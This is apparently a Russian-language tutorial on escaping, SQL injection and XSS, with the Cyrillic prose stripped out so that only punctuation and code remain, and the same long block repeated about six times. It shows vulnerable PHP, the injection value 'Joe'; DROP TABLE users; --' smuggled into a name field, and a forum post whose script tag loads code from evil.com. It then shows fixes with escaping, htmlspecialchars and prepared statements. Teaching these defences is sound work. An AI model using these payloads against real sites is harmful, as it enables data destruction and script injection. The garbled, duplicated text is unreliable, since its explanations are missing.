SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , ? - javascript ? , , , . .
, - , , ! , "" , , . ?
? , ? , , ""? , !
, . - :
$name = $_POST['name']; $name = mysql_real_escape_string($name); $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, "" . SQL-, :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc\'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe\'; DROP TABLE users; --'
mysql_real_escape_string
, - .
, :
<div class="post"> <p class="meta"> Posted by <?php echo htmlspecialchars($post['username']); ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo htmlspecialchars($post['body']); ?> </p> </div>
htmlspecialchars
, , . :
<div class="post"> <p class="meta"> Posted by JackTR on July 18, 12:56 </p> <p class="body"> <script src="http://evil.com/dangerous.js" type="text/javascript" charset="utf-8"></script> </p> </div>
, , , "". HTML .
...
, : , , . SQL, SQL. HTML, HTML. ( ), ( ). .
, , , :
Validation
, . , , . , "DROP TABLE users" , , , "42". , HTML/SQL-, .. , "". . Sanitization
"" , . , - HTML-, . , .
Prepared SQL statements
, , : SQL- , . :
$stmt = $pdo->prepare('SELECT phone_number FROM users WHERE name = ?'); $stmt->execute($_POST['name']);
, . , .
, . (), , . ( ) . "" - , . , , , SQL- ( HTML).
? , - ? XML - . . . , - , i .
, - .
<?xml version="1.0" encoding="UTF-8" ?> <article> <author>Homo Sapiens</author> <contents> Basic math tells us that if x < n and y > n, x cannot be larger than y. </contents> </article>
, . "<" "<", ">" - ">".
- , , , .
escape |iˈskāp| [ no obj. ] [ with obj. ] / [...] [ with obj. ] IT: - [...]
, , , , . , , : " , ?" .
, (&) - . , "<", "<"? XML, escape- &, - " &
", .. : " &<
"
XML - "" . , :
var name = "Homo Sapiens"; var contents = "Suppose, there is the English text, which I don't wanna translate into Russian";
- " " . :
var name = "Homo Sapiens"; var contents = "Basic math tells us that if x < n and y > n, x cannot be larger than y.";
! ! , , , -?
var name = "Homo Sapiens"; var contents = "Plato is said to once have said "Lorem ipsum dolor sit amet".";
... , . , . . - , " ", . :
var name = "Homo Sapiens"; var contents = "Plato is said to once have said \"Lorem ipsum dolor sit amet\".";
"\" . , -, , "\" - . , , : "\\". , ?
!
, . , . , , "". , , . , , , , HTML, , , , HTML, , , "" HTML .
- SQL . SQL - , :
SELECT phone_number FROM users WHERE name = 'Alex'
, . , SQL . , :
$query = "SELECT phone_number FROM users WHERE name = 'Alex'"; $result = mysql_query($query);
, . "", , , , . , - .
, , -, . , :
$name = $_POST['name']; $query = "SELECT phone_number FROM users WHERE name = '$name'"; $result = mysql_query($query);
, : - -! , - ! ! , - , ! !
, . $_POST['name']
- , -. SQL-, , . SQL "" .
, ? , - :
Alex
SELECT phone_number FROM users WHERE name = 'Alex'
Mc'Donalds
SELECT phone_number FROM users WHERE name = 'Mc'Donalds'
Joe'; DROP TABLE users; --
SELECT phone_number FROM users WHERE name = 'Joe'; DROP TABLE users; --'
, , ? 2, , "" - '. ! 4 - . ? ...
, ... , . , - : Joe, users ( '), .
. , , , , , 10 . SQL-, . , , , , , .. , - "" .
!
: XSS . , HTML.
, , , -, . , , .. - - :
<div class="post"> <p class="meta"> Posted by <?php echo $post['username']; ?> on <?php echo date('F j, H:i', $post['date']); ?> </p> <p class="body"> <?php echo $post['body']; ?> </p> </div>
, , :
<div class="post"> <p class="meta"> Posted by Plato on January 2, 15:31 </p> <p class="body"> I am said to have said "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat." </p> </div>
, , , , :
<div class="post"> <p class="meta"> Posted by Pascal on November 23, 04:12 </p> <p class="body"> Basic math tells us that if x < n and y > n, x cannot be larger than y. </p> </div>
... . , , , ?
